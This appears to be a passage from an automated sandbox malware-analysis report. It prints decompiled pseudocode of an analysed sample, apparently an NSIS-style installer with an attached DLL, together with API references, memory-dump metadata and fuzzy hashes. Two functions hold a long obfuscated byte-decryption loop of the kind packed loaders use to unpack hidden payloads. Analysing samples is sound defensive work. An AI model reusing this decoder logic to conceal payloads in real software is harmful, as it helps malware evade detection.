              				void* _t95;
              				void* _t96;
              				void* _t100;
              
              				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
              				_t96 = E00402A29(0xffffffdf);
              				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
              				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
              				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
              				if(E00405727(_t96) == 0) {
              					E00402A29(0x21);
              				}
              				_t44 = _t100 + 8;
              				__imp__CoCreateInstance(0x407504, _t75, 1, 0x4074f4, _t44);
              				if(_t44 < _t75) {
              					L13:
              					 *((intOrPtr*)(_t100 - 4)) = 1;
              					_push(0xfffffff0);
              				} else {
              					_t48 =  *((intOrPtr*)(_t100 + 8));
              					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407514, _t100 - 8);
              					if(_t95 >= _t75) {
              						_t52 =  *((intOrPtr*)(_t100 + 8));
              						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
              						_t54 =  *((intOrPtr*)(_t100 + 8));
              						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\Albus\\AppData\\Local\\Temp");
              						_t81 =  *(_t100 - 0x18);
              						_t58 = _t81 >> 0x00000008 & 0x000000ff;
              						if(_t58 != 0) {
              							_t88 =  *((intOrPtr*)(_t100 + 8));
              							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
              							_t81 =  *(_t100 - 0x18);
              						}
              						_t59 =  *((intOrPtr*)(_t100 + 8));
              						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
              						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
              							_t71 =  *((intOrPtr*)(_t100 + 8));
              							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
              						}
              						_t62 =  *((intOrPtr*)(_t100 + 8));
              						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
              						_t64 =  *((intOrPtr*)(_t100 + 8));
              						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
              						if(_t95 >= _t75) {
              							_t95 = 0x80004005;
              							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409438, 0x400) != 0) {
              								_t69 =  *((intOrPtr*)(_t100 - 8));
              								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409438, 1);
              							}
              						}
              						_t66 =  *((intOrPtr*)(_t100 - 8));
              						 *((intOrPtr*)( *_t66 + 8))(_t66);
              					}
              					_t50 =  *((intOrPtr*)(_t100 + 8));
              					 *((intOrPtr*)( *_t50 + 8))(_t50);
              					if(_t95 >= _t75) {
              						_push(0xfffffff4);
              					} else {
              						goto L13;
              					}
              				}
              				E00401423();
              				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t100 - 4));
              				return 0;
              			}






















              APIs
              • CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?), ref: 004020A6
              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
              Strings
              • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: ByteCharCreateInstanceMultiWide
              • String ID: C:\Users\user\AppData\Local\Temp
              • API String ID: 123533781-2935972921
              • Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
              • Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
              • Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
              • Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 39%
              			E00402671(char __ebx, char* __edi, char* __esi) {
              				void* _t19;
              
              				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
              					E00405B25(__edi, _t6);
              					_push(_t19 - 0x170);
              					_push(__esi);
              					E00405BC7();
              				} else {
              					 *__edi = __ebx;
              					 *__esi = __ebx;
              					 *((intOrPtr*)(_t19 - 4)) = 1;
              				}
              				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t19 - 4));
              				return 0;
              			}





              APIs
              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: FileFindFirst
              • String ID:
              • API String ID: 1974802433-0
              • Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
              • Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
              • Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
              • Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E7306BA78(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
              				signed int _v5;
              				signed int _v12;
              
              				_v12 = _v12 & 0x00000000;
              				_v12 = _v12 & 0x00000000;
              				while(_v12 < _a8) {
              					_v5 =  *((intOrPtr*)(_a4 + _v12));
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) + _v12;
              					_v5 =  ~(_v5 & 0x000000ff);
              					_v5 = _v5 & 0x000000ff ^ 0x0000006a;
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
              					_v5 = (_v5 & 0x000000ff) - 0x28;
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) + 0xf4;
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 =  ~(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) + _v12;
              					_v5 = _v5 & 0x000000ff ^ 0x000000cf;
              					_v5 = (_v5 & 0x000000ff) - 0xff;
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) + _v12;
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 =  ~(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
              					_v5 = (_v5 & 0x000000ff) + _v12;
              					_v5 = _v5 & 0x000000ff ^ 0x00000041;
              					_v5 =  ~(_v5 & 0x000000ff);
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 = (_v5 & 0x000000ff) + 0x7f;
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) - 0x42;
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 = (_v5 & 0x000000ff) + 0xfb;
              					_v5 = _v5 & 0x000000ff ^ 0x000000b6;
              					_v5 = (_v5 & 0x000000ff) - 0xf5;
              					_v5 =  ~(_v5 & 0x000000ff);
              					_v5 = _v5 & 0x000000ff ^ 0x00000020;
              					_v5 = (_v5 & 0x000000ff) + 0x50;
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) + 0x79;
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) - 0x82;
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 = (_v5 & 0x000000ff) + 0xaa;
              					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
              					_v5 = (_v5 & 0x000000ff) + _v12;
              					_v5 =  ~(_v5 & 0x000000ff);
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) - 0xe3;
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 = (_v5 & 0x000000ff) - _v12;
              					_v5 = (_v5 & 0x000000ff) >> 0x00000002 | (_v5 & 0x000000ff) << 0x00000006;
              					_v5 = (_v5 & 0x000000ff) + _v12;
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) + _v12;
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 =  ~(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) - _v12;
              					_v5 =  ~(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) - 0xf5;
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 = (_v5 & 0x000000ff) - 0xc7;
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 = (_v5 & 0x000000ff) + 0x4a;
              					_v5 = (_v5 & 0x000000ff) >> 0x00000006 | (_v5 & 0x000000ff) << 0x00000002;
              					_v5 = (_v5 & 0x000000ff) - 0xfc;
              					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
              					_v5 = (_v5 & 0x000000ff) + _v12;
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 = (_v5 & 0x000000ff) - 0x59;
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) - _v12;
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) + _v12;
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 = (_v5 & 0x000000ff) + _v12;
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 = (_v5 & 0x000000ff) - _v12;
              					_v5 =  ~(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) + _v12;
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 =  ~(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) >> 0x00000005 | (_v5 & 0x000000ff) << 0x00000003;
              					_v5 = (_v5 & 0x000000ff) - _v12;
              					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
              					_v5 = (_v5 & 0x000000ff) + _v12;
              					_v5 = _v5 & 0x000000ff ^ _v12;
              					_v5 = (_v5 & 0x000000ff) >> 0x00000007 | (_v5 & 0x000000ff) << 0x00000001;
              					_v5 = (_v5 & 0x000000ff) - 0x42;
              					_v5 = _v5 & 0x000000ff ^ 0x000000f1;
              					_v5 =  !(_v5 & 0x000000ff);
              					_v5 = (_v5 & 0x000000ff) - _v12;
              					_v5 = (_v5 & 0x000000ff) >> 0x00000001 | (_v5 & 0x000000ff) << 0x00000007;
              					 *((char*)(_a4 + _v12)) = _v5;
              					_v12 = _v12 + 1;
              				}
              				return _a4;
              			}






              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf9281222b952343c838f90d21169d66bb1197a50354fc7bd1d372df4429e503
              • Instruction ID: 8404e66f47246a8b7ec06dea96f9855f16dbf2580e5e49a8d80bd9bdd99c4e3a
              • Opcode Fuzzy Hash: bf9281222b952343c838f90d21169d66bb1197a50354fc7bd1d372df4429e503
              • Instruction Fuzzy Hash: 6202155485D2EDADDB06CBF984607FCBFB05D26102F0841CAE4E5E6283C53A938EDB21
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E7306BA87() {
              				void* _t509;
              
              				L0:
              				while(1) {
              					L0:
              					 *(_t509 - 8) =  *(_t509 - 8) + 1;
              					L1:
              					if( *(_t509 - 8) <  *((intOrPtr*)(_t509 + 0xc))) {
              						L2:
              						 *(_t509 - 1) =  *((intOrPtr*)( *((intOrPtr*)(_t509 + 8)) +  *(_t509 - 8)));
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
              						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^ 0x0000006a;
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t509 - 1) & 0x000000ff) << 0x00000006;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0x28;
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) + 0xf4;
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^ 0x000000cf;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0xff;
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t509 - 1) & 0x000000ff) << 0x00000002;
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t509 - 1) & 0x000000ff) << 0x00000007;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^ 0x00000041;
              						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) + 0x7f;
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t509 - 1) & 0x000000ff) << 0x00000006;
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0x42;
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) + 0xfb;
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^ 0x000000b6;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0xf5;
              						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^ 0x00000020;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) + 0x50;
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) + 0x79;
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0x82;
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t509 - 1) & 0x000000ff) << 0x00000007;
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) + 0xaa;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t509 - 1) & 0x000000ff) << 0x00000003;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
              						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0xe3;
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t509 - 1) & 0x000000ff) << 0x00000001;
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) -  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000002 | ( *(_t509 - 1) & 0x000000ff) << 0x00000006;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) -  *(_t509 - 8);
              						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0xf5;
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0xc7;
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) + 0x4a;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000006 | ( *(_t509 - 1) & 0x000000ff) << 0x00000002;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0xfc;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t509 - 1) & 0x000000ff) << 0x00000001;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0x59;
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) -  *(_t509 - 8);
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) -  *(_t509 - 8);
              						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) =  ~( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000005 | ( *(_t509 - 1) & 0x000000ff) << 0x00000003;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) -  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t509 - 1) & 0x000000ff) << 0x00000007;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) +  *(_t509 - 8);
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000007 | ( *(_t509 - 1) & 0x000000ff) << 0x00000001;
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) - 0x42;
              						 *(_t509 - 1) =  *(_t509 - 1) & 0x000000ff ^ 0x000000f1;
              						 *(_t509 - 1) =  !( *(_t509 - 1) & 0x000000ff);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) -  *(_t509 - 8);
              						 *(_t509 - 1) = ( *(_t509 - 1) & 0x000000ff) >> 0x00000001 | ( *(_t509 - 1) & 0x000000ff) << 0x00000007;
              						 *((char*)( *((intOrPtr*)(_t509 + 8)) +  *(_t509 - 8))) =  *(_t509 - 1);
              						continue;
              					}
              					L3:
              					return  *((intOrPtr*)(_t509 + 8));
              					L4:
              				}
              			}





              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e7e03b24fd26e53a165a1727b6dbd5fa1e284f3aa870073fdfa23fadb09b4614
              • Instruction ID: 3502f7cb5a3af0c493bbd305694cfe7c42c1de1d9d4b3f0f41be89705d4c2d6c
              • Opcode Fuzzy Hash: e7e03b24fd26e53a165a1727b6dbd5fa1e284f3aa870073fdfa23fadb09b4614
              • Instruction Fuzzy Hash: 8402045485D2EDADDB06CBF945607FCBFB05D2A102F0841CAE4E5E6283C53A938EDB21
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 79%
              			E00406354(signed int __ebx, signed int* __esi) {
              				signed int _t396;
              				signed int _t425;
              				signed int _t442;
              				signed int _t443;
              				signed int* _t446;
              				void* _t448;
              
              				L0:
              				while(1) {
              					L0:
              					_t446 = __esi;
              					_t425 = __ebx;
              					if( *(_t448 - 0x34) == 0) {
              						break;
              					}
              					L55:
              					__eax =  *(__ebp - 0x38);
              					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
              					__ecx = __ebx;
              					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
              					__ebx = __ebx + 8;
              					while(1) {
              						L56:
              						if(__ebx < 0xe) {
              							goto L0;
              						}
              						L57:
              						__eax =  *(__ebp - 0x40);
              						__eax =  *(__ebp - 0x40) & 0x00003fff;
              						__ecx = __eax;
              						__esi[1] = __eax;
              						__ecx = __eax & 0x0000001f;
              						if(__cl > 0x1d) {
              							L9:
              							_t443 = _t442 | 0xffffffff;
              							 *_t446 = 0x11;
              							L10:
              							_t446[0x147] =  *(_t448 - 0x40);
              							_t446[0x146] = _t425;
              							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
              							L11:
              							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
              							_t446[0x26ea] =  *(_t448 - 0x30);
              							E00406AC3( *(_t448 + 8));
              							return _t443;
              						}
              						L58:
              						__eax = __eax & 0x000003e0;
              						if(__eax > 0x3a0) {
              							goto L9;
              						}
              						L59:
              						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
              						__ebx = __ebx - 0xe;
              						_t94 =  &(__esi[2]);
              						 *_t94 = __esi[2] & 0x00000000;
              						 *__esi = 0xc;
              						while(1) {
              							L60:
              							__esi[1] = __esi[1] >> 0xa;
              							__eax = (__esi[1] >> 0xa) + 4;
              							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
              								goto L68;
              							}
              							L61:
              							while(1) {
              								L64:
              								if(__ebx >= 3) {
              									break;
              								}
              								L62:
              								if( *(__ebp - 0x34) == 0) {
              									goto L182;
              								}
              								L63:
              								__eax =  *(__ebp - 0x38);
              								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
              								__ecx = __ebx;
              								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
              								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
              								__ebx = __ebx + 8;
              							}
              							L65:
              							__ecx = __esi[2];
              							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
              							__ebx = __ebx - 3;
              							_t108 = __ecx + 0x4073e8; // 0x121110
              							__ecx =  *_t108;
              							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
              							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
              							__ecx = __esi[1];
              							__esi[2] = __esi[2] + 1;
              							__eax = __esi[2];
              							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
              							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
              								goto L64;
              							}
              							L66:
              							while(1) {
              								L68:
              								if(__esi[2] >= 0x13) {
              									break;
              								}
              								L67:
              								_t119 = __esi[2] + 0x4073e8; // 0x4000300
              								__eax =  *_t119;
              								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
              								_t126 =  &(__esi[2]);
              								 *_t126 = __esi[2] + 1;
              							}
              							L69:
              							__ecx = __ebp - 8;
              							__edi =  &(__esi[0x143]);
              							 &(__esi[0x148]) =  &(__esi[0x144]);
              							__eax = 0;
              							 *(__ebp - 8) = 0;
              							__eax =  &(__esi[3]);
              							 *__edi = 7;
              							__eax = E00406B2B( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
              							if(__eax != 0) {
              								L72:
              								 *__esi = 0x11;
              								while(1) {
              									L180:
              									_t396 =  *_t446;
              									if(_t396 > 0xf) {
              										break;
              									}
              									L1:
              									switch( *((intOrPtr*)(_t396 * 4 +  &M00406A83))) {
              										case 0:
              											L101:
              											__eax = __esi[4] & 0x000000ff;
              											__esi[3] = __esi[4] & 0x000000ff;
